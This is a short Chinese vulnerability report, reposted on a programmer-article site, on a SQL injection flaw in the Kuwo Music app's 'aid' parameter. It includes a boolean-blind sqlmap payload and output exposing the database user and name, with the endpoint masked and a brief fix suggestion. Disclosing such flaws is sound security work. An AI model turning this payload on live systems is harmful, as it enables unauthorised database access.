欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

酷我音乐APP一处SQL注入漏洞

程序员文章站 2022-06-26 10:33:29
  酷我音乐APP一处SQL注入漏洞   *****300&type=guid&_=1478935789&*****   注入点:aid   sqlma...

  酷我音乐APP一处SQL注入漏洞

  *****300&type=guid&_=1478935789&*****

  注入点:aid

酷我音乐APP一处SQL注入漏洞

  sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

  ---

  Parameter: aid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663

  ---

  web application technology: JSP

  back-end DBMS: MySQL >= 5.0.2

  current user: 'root@192.168.298.15'

  current database: 'MLOG'

  仅作验证,请尽快修复!

  修复方案:

  参数过滤